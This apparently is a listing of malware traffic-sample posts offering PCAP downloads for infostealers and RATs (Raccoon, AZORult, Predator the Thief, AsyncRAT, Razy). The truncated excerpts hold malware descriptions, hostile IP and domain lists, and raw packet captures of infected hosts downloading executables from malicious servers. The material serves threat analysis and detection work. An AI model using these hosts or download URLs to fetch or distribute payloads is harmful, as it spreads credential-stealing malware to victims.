AsyncRAT RacoonStealer tunnabelly.ug jamshed.pk vbchjfssdfcxbcver.ru thompson.ug PCAP Traffic Sample File Download

2020-06-23 15:26:21.518710 IP 10.1.10.15.49742 > 217.8.117.45.80: Flags [P.], seq 1:502, ack 1, win 16425, length 501: HTTP: GET /zxcv.EXE HTTP/1.1 E….=@…wX . …u-.N.P’&”i….P.@).Q..GET /zxcv.EXE HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=90210- Unless-Modified-Since: Sat, 20 Jun 2020 15:23:12 GMT If-Range: “177000-5a8859680d070” Host: jamshed.pk Connection: Keep-Alive 2020-06-23 15:26:21.594726 IP 10.1.10.15.49724 > 64.31.23.18.80: Flags [.], ack 50, win 16363, length 0 E..(.>@…pQ . .@….<.P..fx..c.P.?……….. 2020-06-23 15:26:21.673543 IP 217.8.117.45.80 > 10.1.10.15.49742: Flags [.], ack 502, win […]

AZORult RacoonStealer Banking Malware Crypto miner PCAP File Download Traffic Sample

AZORult/RacoonStealer can steal banking information including passwords and credit card details as well as cryptocurrency. This constantly updated information stealer malware should not be taken lightly, as it continues to be an active threat. Raccoon is an info stealer type malware available as a Malware as a Service. It can be obtained for a subscription and costs $200 per month. Raccoon malware has already infected over 100,000 devices and became one of the most mentioned viruses on the underground forums in 2019.  TypeStealer  Originex-USSR Raccoon malware comes with fairly basic info stealer functions and by itself lacks any kind of […]

PredatorTheThief TaurusStealer Predator Stealer Malware PCAP File Download Traffic Sample dllhost.exe toeghaiofiehfihf.ws

Predator the Thief is an information stealer, meaning that it is a malware that steals data from infected systems. This virus can access the camera and spy on victims, steal passwords and login information as well as retrieve payment data from cryptocurrency wallets.  TypeStealer  Originex-USSR  First seen1 July, 2018  Last seen29 May, 2020 Connections PID Process IP ASN CN Reputation 2492 uplads.exe 185.136.169.150:80 DE malicious 2576 MSIE711.tmp 88.99.66.31:443 Hetzner Online GmbH DE malicious 932 dllhost.exe 217.8.117.63:80 –– malicious DNS requests Domain IP Reputation iplogger.org 88.99.66.31 shared Threats PID Process Class Message 2492 uplads.exe A Network Trojan was detected STEALER [PTsecurity] […]

Racoon Crimeware Malware PCAP File Download AZORult MSILPerseus tribunal.ug

Hostile IPs: 172.217.164.131 172.217.9.206 172.253.63.132 188.127.249.210 195.201.225.248 217.8.117.45 34.107.4.68 91.193.75.172 96.6.6.64 Dynamic Analysis Report Classification: DownloaderSpyware Threat Names: AZORult v3Gen:Variant.MSILPerseus.224291Trojan.GenericKD.42815195 2020-05-29 20:39:31.460098 IP 10.1.10.15.49233 > 217.8.117.45.80: Flags [P.], seq 1:504, ack 1, win 16425, length 503: HTTP: GET /zxcvb.exe HTTP/1.1 E…..@….. . …u-.Q.P?…..j.P.@).7..GET /zxcvb.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Range: bytes=101892- Unless-Modified-Since: Wed, 27 May 2020 16:24:13 GMT If-Range: “43200-5a6a3a481cf60” Host: tribunal.ug Connection: Keep-Alive 2020-05-29 20:39:31.615857 IP 217.8.117.45.80 > 10.1.10.15.49233: Flags [.], […]

Razy Malware Crimeware PCAP File Download Traffic Analysis system.exe gasfer.ru

Malware downloads and loads the dropper from the 64.31.23.26 but the host is down so it dies at this point. Hostile IPs: 64.31.23.26 81.177.135.143 2020-05-29 21:35:33.540911 IP 10.1.10.15.49235 > 81.177.135.143.80: Flags [P.], seq 1:394, ack 1, win 16425, length 393: HTTP: GET /system.exe HTTP/1.1 E…..@….! . .Q….S.P……..P.@)Zs..GET /system.exe HTTP/1.1 Accept: image/jpeg, application/x-ms-application, image/gif, application/xaml+xml, image/pjpeg, application/x-ms-xbap, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729) Accept-Encoding: gzip, deflate Host: gasfer.ru Connection: Keep-Alive 2020-05-29 21:35:33.660116 IP 10.1.10.15.49196 > 64.31.23.26.80: Flags [.], ack 50, win 16351, length 0 E..(..@….. […]